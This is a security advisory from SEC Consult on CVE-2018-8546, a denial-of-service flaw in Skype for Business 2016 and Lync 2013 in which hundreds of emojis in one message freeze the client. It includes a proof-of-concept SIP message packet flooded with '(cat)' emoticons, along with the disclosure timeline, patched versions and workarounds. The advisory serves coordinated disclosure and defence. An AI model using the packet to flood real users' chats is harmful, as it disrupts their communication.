Microsoft Skype 2015 / 2016 Denial Of Service

`SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >  
=======================================================================  
title: Denial of Service  
product: Microsoft Skype for Business 2016 / Lync 2013  
vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before  
v15.0.5075.1000  
Skype for Business 2016: before v16.0.4756.1000  
fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000  
Skype for Business 2016 v16.0.4756.1000  
CVE number: CVE-2018-8546  
impact: Medium  
homepage: https://www.skype.com/en/business/  
found: 08/2018  
by: Sabine Degen (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Skype for Business (formerly Microsoft Office Communicator and Microsoft  
Lync) is an instant messaging client used with Skype for Business Server or  
with Skype for Business Online (available with Microsoft Office 365).  
Skype for Business is enterprise software."  
  
Source: https://en.wikipedia.org/wiki/Skype_for_Business  
  
  
Business recommendation:  
------------------------  
Assess the impact of this vulnerability on your business. The patch  
provided by Microsoft should be installed immediately. Especially if  
Skype for Business is being used for external communication.  
  
  
Vulnerability overview/description:  
-----------------------------------  
A large number of emojis (e.g. ~800 kittens) received in one message by the Skype  
For Business client freezes the program for a few seconds. This can be  
exploited to perform Denial of Service attacks against Skype for Business  
users and compromises the availability of the program.  
  
For example, an attacker can continuously send such messages to the chat  
window of a meeting room in order to freeze the program for all participants  
and prevent them from using the chat or seeing the video.  
  
Note that the sound and video stream is handled by a separate thread and  
therefore are not affected (e.g. killed), only the functions related to  
graphical user interface become unusable.  
  
  
Proof of concept:  
-----------------  
After sending a big amount of emojis (~800 kittens) to a Skype for Business  
chat, the program freezes for a few seconds while rendering the chat window.  
Continuously sending emojis will make the GUI unusable for the user.  
Ongoing conference calls are not affected or interrupted.  
  
The following SIP packet illustrates the attack.  
  
MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0  
Via: SIP/2.0/tls 127.0.0.1:7490  
From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8  
To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6  
Max-Forwards: 70  
CSeq: 12 MESSAGE  
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)  
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x  
Route:  
<sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA>  
Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu>  
Content-Type: text/plain;  
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA  
Content-Length: 4420  
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications  
Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"  
  
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)  
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)  
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)  
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)  
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following versions have been identified as vulnerable which were  
the latest versions available at the time of the test:  
  
* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013  
* Skype for Business 2016 MSO (16.0.93).64-Bit,  
  
Both versions were running on Windows 10 Pro.  
  
According to the vendor, all previous versions are affected:  
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000  
* Skype for Business 2016: before v16.0.4756.1000  
  
  
Vendor contact timeline:  
------------------------  
2018-08-02: Vulnerability details submitted to Microsoft,  
MSRC Case 47060aassigned  
2018-08-28: Asking for a status update  
2018-08-30: Vendor: issue has been reproduced, solution to block the user  
provided  
2018-08-31: Follow-up questions why DoS is not categorized as security issue  
as the provided workaround is not effective for attacks already  
in progress  
2018-08-31: Vendor: decided to fix the issue, rollout planned for early October  
2018-09-03: Agreed to release advisory after mid October  
2018-10-10: Asking for a status update  
2018-10-10: Microsoft: Issue has been fixed on October 2nd, CVE number will be  
assigned soon.  
2018-10-10: Asking for affected versions, advisory notes  
2018-10-10: Microsoft: KB #4461446 and #4092445  
2018-10-10: Reviewing KB articles, asking Microsoft why there is no mention of  
the security fix in #4092445  
2018-10-11: Microsoft: there was a mistake, the patch needs to be re-released  
as security fix, agreed on postponing until next Patch Tuesday in  
November  
2018-10-15: CVE number CVE-2018-8546 provided on Patch Tuesday  
2018-11-14: Coordinated release of security advisory  
  
  
Solution:  
---------  
Apply the security patches provided by the vendor. The fixed versions are:  
* Skype for Business 2015 (Lync 2013) version 15.0.5075.1000  
* Skype for Business 2016 (KB4092445) version 16.0.4756.1000  
  
Microsoft provided the following links for further information:  
https://support.microsoft.com/en-us/help/4461446/october-2-2018-update-for-skype-for-business-2015-lync-2013-kb4461446  
https://support.microsoft.com/en-us/help/4092445/october-2-2018-update-for-skype-for-business-2016-kb4092445  
  
  
Workaround:  
-----------  
Disable emoticons in Skype for Business:  
Tools -> Options -> IM -> Show emoticons in messages  
  
Or block the user performing the DoS attacks by right-clicking on the contact  
and "Change Privacy Relationship", then click "Blocked Contacts"  
(of course this will only work when there is no active DoS attack)  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF S. Degen / @2018  
  
`